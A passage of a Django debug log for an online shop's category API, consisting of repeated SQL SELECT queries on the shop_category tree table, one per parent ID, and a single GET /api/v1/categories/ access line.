"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:02:25,042 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:02:25,046 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:02:25,048 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:02:25,051 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:02:25,053 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:02:25,056 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:02:25,058 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:02:25,060 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:02:25,064 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:02:25,066 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:02:25,068 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:02:25,071 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:02:25,074 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:02:25,078 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:02:25,081 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:02:25,083 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:02:25,085 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:02:25,088 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:02:25,091 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:02:25,093 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:02:25,095 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:02:25,098 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:02:25,100 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:02:25,102 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:02:25,105 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:02:25,107 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:02:25,109 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:02:25,112 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:02:25,114 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:02:25,117 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:02:25,120 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:02:25,122 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:02:25,124 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:02:25,126 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:02:25,130 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:02:25,133 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:02:25,135 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:02:25,137 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:02:25,139 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:02:25,142 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:02:25,145 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:02:25,148 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:02:25,150 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:02:25,153 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:02:25,155 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:02:25] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:03:06,875 utils 4252 140031747061504 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:03:06,895 utils 4252 140031747061504 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:03:06,905 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:03:06,913 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:03:06,927 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:03:06,934 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:03:06,941 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:03:06,946 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:03:06,950 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:03:06,959 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:03:06,966 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:03:06,972 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:03:06,975 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:03:06,978 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:03:06,982 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:03:06,989 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:03:06,995 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:03:06,999 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:03:07,004 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:03:07,009 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:03:07,012 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:03:07,015 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" 